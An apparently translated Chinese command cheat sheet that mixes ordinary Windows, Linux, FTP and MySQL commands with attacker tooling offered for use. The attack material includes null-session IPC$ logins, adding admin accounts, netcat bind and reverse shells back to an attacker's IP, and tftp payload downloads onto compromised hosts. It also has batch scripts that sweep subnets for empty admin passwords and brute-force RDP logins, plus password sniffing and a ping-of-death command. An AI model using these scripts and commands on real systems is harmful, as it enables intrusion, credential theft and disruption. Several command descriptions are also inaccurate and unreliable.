
Command collection of net use

2025-01-18 Update From: SLTechnology News&Howtos

Shulou (Shulou.com) 06/03

This article is a collection of "net use" and related commands. Each entry gives the command followed by a short description of what it does.

net use \\ip\ipc$ "" /user:""    establish a null (empty) IPC connection

net use \\ip\ipc$ "password" /user:"user name"    establish a non-null IPC connection

net use h: \\ip\c$ "password" /user:"user name"    log in directly and map the other host's C: to local H:

net use h: \\ip\c$    after logging in, map the other host's C: to local H:

net use \\ip\ipc$ /del    delete the IPC connection

net use h: /del    delete the mapping of the other host to local H:

net user username password /add    create a user

net user guest /active:yes    activate the guest user

net user    list the existing users

net user accountname    view the properties of the account

net localgroup administrators username /add    add "user" to the administrators group so that it has administrator privileges. Note: administrators is plural, with an s after administrator

net start    list the services that are started

net start servicename    start a service (e.g. net start telnet, net start schedule)

net stop servicename    stop a service

net time \\target-ip    view the other host's time

net time \\target-ip /set    synchronize the local computer's time with the "target IP" host; adding the /yes parameter skips the confirmation message

net view    see which shares are open on the local LAN

net view \\ip    see which shares are open on the other party's side

net config    display system network settings

net logoff    disconnect connected shares

net pause servicename    pause a service

net send ip "text message"    send a message to the other host

net ver    type and information of the network connections in use on the LAN

net share    view the shares open locally

net share ipc$    enable the ipc$ share

net share ipc$ /del    delete the ipc$ share

net share c$ /del    delete the C: share

net user guest 12345    after logging in as guest, change the password to 12345

net password password    change the system login password

netstat -a    see which ports are open; netstat -an is commonly used

netstat -n    view the network connections of ports; netstat -an is commonly used

netstat -v    view the work in progress

netstat -p protocolname    view the usage of a protocol; example: netstat -p tcp/ip (view tcp/ip protocol usage)

netstat -s    view the usage of all protocols in use

nbtstat -A ip    if one of the relevant ports on the other host is open, shows the user name that recently logged in there (the entry before 03 is the user name). Note: the -A parameter must be capitalized

tracert -parameter ip (or computer name)    trace the route (of packets). The parameter "-w number" sets the timeout interval.

ping ip (or domain name)    send data with a default size of 32 bytes to the other host. Parameters: "-l[space]packet size"; "-n number of times to send"; "-t" means ping continuously.

ping -t -l 65550 ip    ping of death (sending data larger than 64K and pinging continuously becomes the ping of death)

ipconfig (winipcfg)    view the local IP address on Windows NT and XP (Windows 95/98); the ipconfig parameter "/all" displays all configuration information

tlist -t    display processes as a tree list (an add-on tool for the system, not installed by default; it is in the Support/tools folder of the installation directory)

kill -F processname    with the -F parameter, forcibly terminate a process (an add-on tool for the system, not installed by default; it is in the Support/tools folder of the installation directory)

del -F filename    with the -F parameter, read-only files can be deleted. /AR, /AH, /AS, /AA delete read-only, hidden, system, and archive files respectively; /A-R, /A-H, /A-S, /A-A delete files other than read-only, hidden, system, and archive files. For example, "DEL/AR *.*" deletes all read-only files in the current directory, and "DEL/A-S *.*" deletes all files except system files in the current directory.

del /S /Q directory, or: rmdir /s /Q directory    /S deletes the directory and all subdirectories and files under it. Adding the /Q parameter skips the system confirmation and deletes directly. (The two commands do the same thing.)

move drive:\path\file-to-move destination-path\new-file-name    move a file; with the /y parameter, the prompt confirming that the same file exists in the destination directory is skipped and the file is overwritten directly

fc one.txt two.txt > 3st.txt    compare the two files and write the differences to 3st.txt; ">" and ">>" are redirection commands

at id    start a scheduled task that has been registered

at /delete    stop all scheduled tasks; with the /yes parameter, stop without confirmation

at id /delete    stop a registered scheduled task

at    view all scheduled tasks

at \\ip time programname (or a command) /r    run a program on the other host at a given time and restart the computer

finger username@host    see which users have logged in recently

telnet ip port    log in to a remote server; the default port is 23

open ip    connect to the IP (a command used after telnet has started)

telnet    typing telnet on its own on the local machine enters the local telnet

copy path\filename1 path\filename2 /y    copy file 1 to the specified directory as file 2; the /y parameter skips the confirmation that you want to overwrite an existing file

copy c:\srv.exe \\ip\admin$    copy local c:\srv.exe to the other host's admin$ share

copy 1st.jpg/b+2st.txt/a 3st.jpg    hide the contents of 2st.txt inside 1st.jpg, producing the new file 3st.jpg. Note: the head of 2st.txt should have three empty lines. Parameters: /b means binary file, /a means ASCII-format file

copy \\ip\admin$\srv.exe c:\, or: copy \\ip\admin$\*.*    copy the srv.exe file (or all files) under the other host's admin$ share to local C:

xcopy file-or-directory-tree-to-copy destination\directoryname    copy files and directory trees; with the /Y parameter there is no prompt before overwriting identical files

tftp -i own-IP (the IP of the compromised host when one is used as a relay) get server.exe c:\server.exe    after logging in, download server.exe from "IP" to c:\server.exe on the target host. Parameter: -i means transfer in binary mode, as needed for exe files; without -i the transfer is in ASCII mode (text file mode)

tftp -i other-IP put c:\server.exe    after logging in, upload local c:\server.exe to the host

ftp ip port    upload files to the server or perform file operations; the default port is 21. bin means binary transfer (for executable files); the default is ASCII transfer (for text files)

route print    show the IP routes, mainly the network address (Network address), subnet mask (Netmask), gateway address (Gateway address), and interface address (Interface)

arp    view and manipulate the ARP cache. ARP is a name-resolution step that resolves an IP address into a physical MAC address. arp -a displays all entries

start programname-or-command /max or /min    open a new window and run a program or command maximized (minimized)

mem    view cpu usage

attrib filename (directoryname)    view the attributes of a file (directory)

attrib filename -A -R -S -H or +A +R +S +H    remove (add) the archive, read-only, system, hidden attributes of a file; + adds the attribute

dir    view files. Parameters: /Q shows which user owns each file and directory, /T:C shows the file creation time, /T:A shows the time the file was last accessed, /T:W the time it was last modified

date /t, time /t    with this parameter, "DATE/T" and "TIME/T" only display the current date and time, without asking for a new date and time

set environment-variable-name=characters-to-assign    set an environment variable

set    display all current environment variables

set p (or other characters)    display all current environment variables that begin with the character p (or other characters)

pause    pause the batch program and display: press any key to continue.

if    perform conditional processing in a batch program (see "if commands and variables" for more)

goto label    direct cmd.exe to the labelled line in the batch program (the label must be on a line of its own and start with a colon, for example the ":start" label)

call path\batchfilename    call another batch program from a batch program (see call /? for more)

for    execute a specific command for each file in a set of files (see "for commands and variables" for more)

echo on or off    turn echo on or off; echo with no parameters displays the current echo setting

echo information    display the information on the screen

echo information >> pass.txt    save the "information" to the pass.txt file

findstr "Hello" aa.txt    look for the string hello in the aa.txt file

find filename    find a file

title titlename    change the CMD window title

color colorvalue    set the cmd console foreground and background colors; 0 = black, 1 = blue, 2 = green, 3 = light green, 4 = red, 5 = purple, 6 = yellow, 7 = white, 8 = gray, 9 = light blue, A = light green, B = light green, C = light red, D = lilac, E = yellowish, F = bright white

prompt name    change the command prompt displayed by cmd.exe (change C:\, D:\ uniformly to: EntSky\)

print filename    print a text file

ver    display version information in the DOS window

winver    pop up a window showing version information (memory size, system version, patch version, computer name)

format driveletter /FS:type    format a disk; type: FAT, FAT32, NTFS. For example: format D: /FS:NTFS

md directoryname    create a directory

replace sourcefile directory-of-file-to-replace    replace a file

ren originalfilename newfilename    rename a file

tree    display the directory as a tree structure; with the parameter -f, the file names in each folder are listed

type filename    display the contents of a text file

more filename    display the output file screen by screen

doskey command-to-lock=characters

doskey command-to-unlock=    command locking provided for DOS (edit command lines, recall win2k commands, and create macros). For example, lock the dir command: doskey dir=entsky (doskey dir=dir cannot be used); unlock: doskey dir=

taskmgr    bring up Task Manager

chkdsk /F D:    check disk D and display a status report; the /f parameter also fixes errors on the disk

tlntadmn    telnet service administration; type tlntadmn, select 3, then select 8 to change the telnet service's default port 23 to any other port

exit    exit the cmd.exe program; with the /B parameter, exit the current batch script instead of cmd.exe

path path\executable-file-name    set a path for executables.

cmd    launch a win2K command interpreter window. Parameters: /E:OFF, /E:ON turn command extensions off, on; for more information, see cmd /?

regedit /s registryfilename    import into the registry; the /S parameter means quiet-mode import without any prompt

regedit /e registryfilename    export the registry

cacls filename parameters    display or modify a file's access control list (ACL), for NTFS-formatted volumes. Parameters: /D username: deny a user access; /P username:perm replace the specified user's access rights; /G username:perm grant the specified user access rights. Perm can be: N none, R read, W write, C change (write), F full control. Example: cacls D:\test.txt /D pub sets D:\test.txt to deny access to the user pub.

cacls filename    view the list of user access permissions for the file

REM text    add a comment to a batch file

netsh    view or change the local network configuration

IIS service commands:

iisreset /reboot    restart the win2k computer (a message that the system will restart is shown)

iisreset /start or stop    start (stop) all Internet services

iisreset /restart    stop and then restart all Internet services

iisreset /status    display the status of all Internet services

iisreset /enable or disable    enable (disable) restarting of Internet services on the local system

iisreset /rebootonerror    if an error occurs when starting, stopping, or restarting Internet services, restart the computer

iisreset /noforce    if the Internet services cannot be stopped, do not forcibly terminate them

iisreset /timeout Val    if the Internet services still have not stopped when the timeout (in seconds) is reached and the /rebootonerror parameter is specified, the computer restarts. The defaults are 20 seconds for restart, 60 seconds for stop, and 0 seconds for reboot.

FTP command: (more details later)

The command line format for ftp is:

ftp -v -d -i -n -g [hostname]

-v    display all response information from the remote server.

-d    use debug mode.

-n    restrict ftp auto-login, that is, do not use the .netrc file.

-g    disable filename globbing.

help [command] or ? [command]    view a command's description

bye or quit    terminate the FTP process with the host and exit FTP.

pwd    show the current remote host directory

put or send localfilename [filename to use on the host]    transfer a local file to the remote host

get or recv [remote host filename] [local filename to save as]    transfer a file from the remote host to the local host

mget [remote-files]    receive a batch of files from the remote host to the local host

mput local-files    transfer a batch of files from the local host to the remote host

dir or ls [remote-directory] [local-file]    list the files in the current remote host directory; if a local file is given, write the result to it

ascii    transfer files in ASCII mode (default)

bin or image    transfer files in binary mode

bell    sound an alert each time a file transfer completes

cdup    return to the parent directory

close    end the ftp session with the remote server (the counterpart of open)

open host [port]    connect to the specified ftp server; a port can be specified

delete    delete a file on the remote host

mdelete [remote-files]    delete a batch of files

mkdir directory-name    create a directory on the remote host

rename [from] [to]    change a file name on the remote host

rmdir directory-name    delete a directory on the remote host

status    display the current FTP status

system    display the remote host's system type

user user-name [password] [account]    log in to the remote host again with a different user name

open host [port]    establish a new connection

prompt    interactive prompt mode

macdef    define a macro command

lcd    change the working directory on the local host; with no argument, change to the current user's HOME directory

chmod    change file permissions on the remote host

case    when ON, file names copied with the MGET command are converted to lowercase on the local machine

cd remote-dir    enter a directory on the remote host

cdup    enter the parent directory of the remote host directory

!    run an interactive shell on the local machine; exit returns to the ftp environment. Example: !ls *.zip

MYSQL command:

mysql -h hostaddress -u username -p password    connect to MYSQL; if MYSQL has just been installed, the superuser root has no password.

(example: mysql -h210.110.110.110 -uroot -p123456

Note: no space is needed between u and root; the same applies to the other options)

exit    exit MYSQL

mysqladmin -u username -p oldpassword password newpassword    change the password

grant select on database.* to username@loginhost identified by \"password\";    add a new user. (Note: unlike the commands above, the following are commands inside the MYSQL environment and end with a semicolon as the command terminator)

show databases;    display the list of databases. At first there are only two databases: mysql and test. The mysql database is very important: it holds MYSQL's system information, and changing passwords or adding users actually operates on this database.

use mysql;

show tables;    display the tables in the database

describe tablename;    display the structure of a table

create database databasename;    create a database

use databasename;

create table tablename (list of field definitions);    create a table

drop database databasename;

drop table tablename;    delete a database and delete a table

delete from tablename;    empty the records in a table

select * from tablename;    display the records in a table

mysqldump --opt school > school.bbb    back up a database (the command is run in DOS from the \\mysql\\bin directory). Note: this backs up the database school to the file school.bbb; school.bbb is a text file and the file name is arbitrary. Open it and you will find something new.

New commands under win2003 system (practical part):

shutdown /parameter    shut down or restart the local or a remote host.

Parameter description: /S shuts down the host, /R restarts the host, /T number sets the delay time, in the range 0 to 180 seconds, /A cancels the shutdown, and /M \\IP specifies the remote host.

Example: shutdown /r /t 0 restarts the local host immediately (without delay)

taskkill /parameter processname-or-pid    terminate one or more tasks and processes.

Parameter description: /PID the pid of the process to terminate (use the tasklist command to obtain the pid of each process), /IM the name of the process to terminate, /F forcibly terminate the process, /T terminate the specified process and the child processes it started.

tasklist    display the processes, services, and process identifiers (PID) of services currently running on local and remote hosts.

Parameter description: /M lists the dll files loaded by the current processes, and /SVC shows the services that correspond to each process. With no parameters, only the current processes are listed.

Basic commands under Linux system: case-sensitive

uname    display version information (same as ver on win2K)

dir    display the files in the current directory; ls -al also shows hidden files (same as dir on win2K)

pwd    show the location of the current directory

cd    cd .. goes back to the parent directory; note the space between cd and "..". cd / returns to the root directory.

cat filename    view the contents of a file

cat > abc.txt    write content to the abc.txt file.

more filename    display a text file one page at a time.

cp    copy files

mv    move files

rm filename    delete a file; rm -r directoryname deletes a directory and its subdirectories

mkdir directoryname    create a directory

rmdir    delete a subdirectory; the directory must contain no files.

chmod    set access permissions on files or directories

grep    search for strings in files

diff    compare files

find    search for files

date    current date and time

who    show who is currently using the same machine as you, with their login time and place

w    show details of the users currently logged in.

whoami    check your own account name.

groups    check which groups someone belongs to

passwd    change the password

history    view the commands you have issued

ps    display the status of processes

kill    stop a process

gcc    hackers usually use it to compile files written in C.

su    switch privileges to the specified user

telnet IP    telnet to the other host (same as win2K). When bash$ appears, the connection has succeeded.

ftp    ftp to a server (same as win2K)

Attached: batch commands and variables

1: for commands and variables, basic format:

FOR /parameter %variable IN (set) DO command [command_parameters]

%variable: specifies a single-letter replaceable parameter, such as %i; to specify a variable use %%i; and to call a variable use %i%. Variables are case-sensitive (%i is not equal to %I).

A batch file can handle 10 variables at a time, %0 through %9. %0 is used by default for the batch file name, %1 is by default the first value entered when the batch file is run, and likewise %2 through %9 are the 2nd through 9th values entered. For example, in net use \\ip\ipc$ pass /user:user, ip is %1, pass is %2, user is %3.

(set): specifies a file or group of files; wildcards can be used. Examples: (D:\user.txt) and (1 1 254) (1 -1 254). {In "(1 1 254)" the first "1" is the starting value, the second "1" is the increment, and the third, "254", is the end value, that is, from 1 to 254; "(1 -1 254)" means from 254 to 1}

command: specifies the command to run on each file, such as the net use command; to run several commands, separate them with: &

command_parameters: specifies parameters or command-line switches for the given command

IN (set): means to take values from (set); DO command: means to execute command

Parameters: /L means the incremental form {(set) is in incremental form}; /F means to keep taking values from a file until they are used up {(set) is a file, such as (d:\pass.txt)}.

Examples of usage:

@echo off

echo usage format: test.bat *.*.* > test.txt

for /L %%G in (1 1 254) do echo %1.%%G >> test.txt & net use \\%1.%%G /user:administrator | find "Command completed successfully" >> test.txt

Save as test.bat. Description: for each of the 254 IPs of a specified Class C network segment in turn, try to establish an IPC$ connection as administrator with an empty password, and if it succeeds, store that IP in test.txt.

/L means the incremental form (that is, from 1-254 or 254-1); the first three octets of the input IP, *.*.*, are the batch file's default %1; %%G is a variable (the last octet of the IP); & separates the echo and net use commands; | means that after the ipc$ connection is established, find checks whether the result contains the "command completed successfully" message; %1.%%G is the complete IP address; (1 1 254) gives the start value, increment, and end value.

@echo off

echo usage format: ok.bat ip

FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200

Save as: ok.exe. Description: after an IP is entered, use the dictionary file d:\pass.dic to brute-force the passwords of the users in d:\user.dic, until the values in the file have all been used. %%i is the user name; %1 is the entered IP address (default).

2: if commands and variables, basic format:

IF [not] errorlevel number command    the condition is "true" if the program ran and the exit code it finally returned is equal to or greater than the specified number.

Example: "IF errorlevel 0 command" means that when the value returned by the program is 0, the command after it on the line is executed; "IF not errorlevel 1 command" means that if the last value returned by the program is not equal to 1, the command after it is executed.

0 means found and executed successfully (true); 1 means not found, not executed (false).

IF [not] string1==string2 command    if the specified text strings match (that is, string 1 equals string 2), execute the command after it.

Example: "if "%2%"=="4" goto start" means: if the second variable entered is 4, execute the command after it (note: when calling a variable, write %variablename% and add " ")

IF [not] exist filename command    if the specified file name exists, execute the command after it.

Example: "if not exist nc.exe goto end" means: if the nc.exe file is not found, jump to the ":end" label.

IF [not] errorlevel number command else command, or IF [not] string1==string2 command else command, or IF [not] exist filename command else command    adding "else command" means: when the preceding condition is not true, the command after else is executed. Note: else must be on the same line as if to be valid. When there is a del command, the entire del command must be enclosed in < >, because the del command can only be executed on a line of its own; enclosing it in < > makes it equivalent to being on its own line. For example: "if exist test.txt. else echo test.txt.missing"; note the "." in the command.

(2) External commands of the system (all require the relevant tools to be downloaded):

1. Swiss Army knife: nc.exe

Parameter description:

-h    view help information

-d    background mode

-e prog    program redirection; executed as soon as a connection is made [dangerous]

-i secs    delay interval

-l    listen mode, for inbound connections

-L    listen mode; keeps listening after the connection is closed, until Ctrl+C

-n    numeric IP address; domain names cannot be used

-o file    record the traffic in hexadecimal

-p[space]port    local port number

-r    random local and remote ports

-t    use Telnet interaction

-u    UDP mode

-v    verbose output; -vv is more verbose

-w number    timeout interval

-z    turn off input and output (used when scanning)

Basic usage:

nc -nvv 192.168.0.1 80    connect to port 80 of the host 192.168.0.1

nc -l -p 80    open TCP port 80 on this machine and listen

nc -nvv -w2 -z 192.168.0.1 80-1024    scan ports 80-1024 of 192.168.0.1

nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe    bind the remote host's cmdshell to the remote host's TCP port 5354

nc -t -e c:\winnt\system32\cmd.exe 192.168.0.2 5354    bind the remote host's cmdshell and connect back to port 5354 of 192.168.0.2

Advanced usage:

nc -L -p 80    as a honeypot, 1: open port 80 and keep listening until Ctrl+C

nc -L -p 80 > c:\log.txt    as a honeypot, 2: open port 80 and keep listening until Ctrl+C, while writing the result to c:\log.txt

nc -L -p 80 < c:\honeyport.txt    as a honeypot, 3-1: open port 80 and keep listening until Ctrl+C, feeding the contents of c:\honeyport.txt into the pipe; this can also be used to transfer a file

type.exe c:\honeyport | nc -L -p 80    as a honeypot, 3-2: open port 80 and keep listening until Ctrl+C, feeding the contents of c:\honeyport.txt into the pipe; this can also be used to transfer a file

On the local machine: nc -l -p local-port

On the other host: nc -e cmd.exe local-IP -p local-port    *win2K

nc -e /bin/sh local-IP -p local-port    *linux, unix    reverse connection to get through the other host's firewall

On the local machine: nc -d -l -p local-port < path and name of the file to send

On the other host: nc -vv local-IP local-port > path and name of the file to store    transfer a file to the other host

Remarks:

| is the pipe command

< or > are redirection commands. ">" means: overwrite; ">>" means: save to (append).

For example, compare running @dir c:\winnt >> d:\log.txt twice with running @dir c:\winnt > d:\log.txt twice: with >> the results of both runs are saved, but with > only one result is kept, because the result of the second run overwrites the first.

2. Scanning tool: xscan.exe

Basic format

xscan -host [-] [other options]    scan all host information in the "start IP to end IP" range

xscan -file [other options]    scan all host information in the "host IP list file"

Test items

-active    check whether the host is alive

-os    detect the remote operating system type (through the NETBIOS and SNMP protocols)

-port    detect the port status of common services

-ftp    detect weak FTP passwords

-pub    detect anonymous-user write permission on FTP services

-pop3    detect weak POP3-Server passwords

-smtp    detect SMTP-Server vulnerabilities

-sql    detect weak SQL-Server passwords

-smb    detect weak NT-Server passwords

-iis    detect IIS encoding/decoding vulnerabilities

-cgi    detect CGI vulnerabilities

-nasl    load Nessus attack scripts

-all    detect all of the above items

Other options

-i adapter-number    set the network adapter; the number can be obtained with the "-l" parameter

-l    display all network adapters

-v    show detailed scan progress

-p    skip hosts that do not respond

-o    skip hosts on which no open port is detected

-t concurrent-threads,concurrent-hosts    specify the maximum number of concurrent threads and concurrent hosts; the defaults are 100 and 10.

-log filename    specify the scan report file name (suffix: TXT or HTML format file)

Usage examples

xscan -host 192.168.1.1-192.168.255.255 -all -active -p    detect all vulnerabilities of hosts in the 192.168.1.1-192.168.255.255 range, skipping unresponsive hosts

xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o    detect the standard port status and weak NT passwords of hosts in the 192.168.1.1-192.168.255.255 range, with a maximum of 150 concurrent threads, skipping hosts on which no open port is detected

xscan -file hostlist.txt -port -cgi -t 200,5 -v -o    detect the standard port status and CGI vulnerabilities of all hosts listed in the file "hostlist.txt", with a maximum of 200 concurrent threads and at most 5 hosts at a time, showing detailed progress and skipping hosts on which no open port is detected

3. Command line sniffer: xsniff.exe

Can capture FTP/SMTP/POP3/HTTP protocol passwords on the local area network

Parameter description

-tcp    output TCP datagrams

-udp    output UDP datagrams

-icmp    output ICMP datagrams

-pass    filter password information

-hide    run in the background

-host    resolve host names

-addr IP-address    filter by IP address

-port port    filter by port

-log filename    save the output to a file

-asc    output in ASCII format

-hex    output in hexadecimal format

Usage examples

xsniff.exe -pass -hide -log pass.log    run in the background, sniff passwords, and save the password information in the pass.log file

xsniff.exe -tcp -udp -asc -addr 192.168.1.1    sniff 192.168.1.1, filter tcp and udp information, and output in ASCII format

4. Terminal Services password cracking: tscrack.exe

Parameter description

-h    display usage help

-v    display version information

-s    print the decryption ability on the screen

-b    sound made when the password is wrong

-t    open multiple connections (multithreaded)

-N    Prevent System Log entries on targeted server

-U    Uninstall: remove tscrack components

-f    use the password after -f

-F    interval (frequency)

-l    use the user name after -l

-w    use the password dictionary after -w

-p    use the password after -p

-D    log in to the main page

Usage examples

tscrack 192.168.0.1 -l administrator -w pass.dic    remotely brute-force the host's administrator login password with a password dictionary file

tscrack 192.168.0.1 -l administrator -p 123456    remotely log in as the administrator user of 192.168.0.1 with the password 123456

@if not exist ipcscan.txt goto noscan

@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i

:noscan

@echo 3389.txt no find or scan faild

(① saved as 3389.bat) (assuming SuperScan or another scanner has already produced 3389.txt, a list of IPs of hosts with port 3389 open)

3389.bat means: take an IP from the 3389.txt file and run hack.bat

@if not exist tscrack.exe goto noscan

@tscrack %1 -l administrator -w pass.dic >> rouji.txt

:noscan

@echo tscrack.exe no find or scan faild

(② saved as hack.bat) (just run 3389.bat, with 3389.bat, hack.bat, 3389.txt, pass.dic and tscrack.exe in the same directory; then wait for the result)

hack.bat means: run tscrack.exe to attack the administrator password of every host in 3389.txt with a dictionary, and save the results in the rouji.txt file.

5. Other:

shutdown.exe

shutdown \\IP-address t    automatically shut down the other NT host after 20 seconds (Windows 2003 ships with this tool; on Windows 2000 you have to download it before you can use it. It is described in detail in the Windows 2003 DOS commands section above.)

fpipe.exe (TCP port redirection tool)    described in detail in the second article (port redirection to bypass a firewall)

fpipe -l 80 -s 1029 -r 80 www.sina.com.cn    when someone scans your port 80, what they get back is the host information of www.sina.com.cn.

fpipe -l 23 -s 88 -r 23 destination-IP    Telnet requests sent to local port 23 are redirected and sent out through port 88 to port 23 of the destination IP (local port 88 is the port used when the Telnet connection to the destination IP is established). After that, telnet 127.0.0.1 (the local IP) connects directly to port 23 of the destination IP.

OpenTelnet.exe (tool for remotely enabling telnet)

opentelnet.exe \\IP account password ntlm-authentication-mode telnet-port    (there is no need to upload ntlm.exe to break Microsoft's authentication method) once the other host's telnet service has been enabled remotely, telnet \\ip can be used to connect to it.

NTLM authentication mode: 0: do not use NTLM authentication; 1: try NTLM authentication first and, if it fails, use the user name and password; 2: use NTLM authentication only.

ResumeTelnet.exe (another tool shipped with OpenTelnet)

resumetelnet.exe \\IP account password    after connecting to the other host with Telnet, use this command to restore the other host's Telnet settings and shut down its Telnet service.

6. Detailed explanation of FTP commands:

The FTP commands are among the commands Internet users use most often. Being familiar with FTP's internal commands and applying them flexibly makes things much easier for the user and gets twice the result with half the effort. If you want to learn to use FTP in the background, you must learn the FTP commands.

The command line format for FTP is:

ftp -v -d -i -n -g [hostname], where

-v    display all response information from the remote server

-n    restrict ftp auto-login, that is, do not use the .netrc file

-d    use debug mode

-g    disable filename globbing

Thank you for reading. That is the content of the "net use command collection"; how each command behaves in a particular environment still needs to be verified in practice.
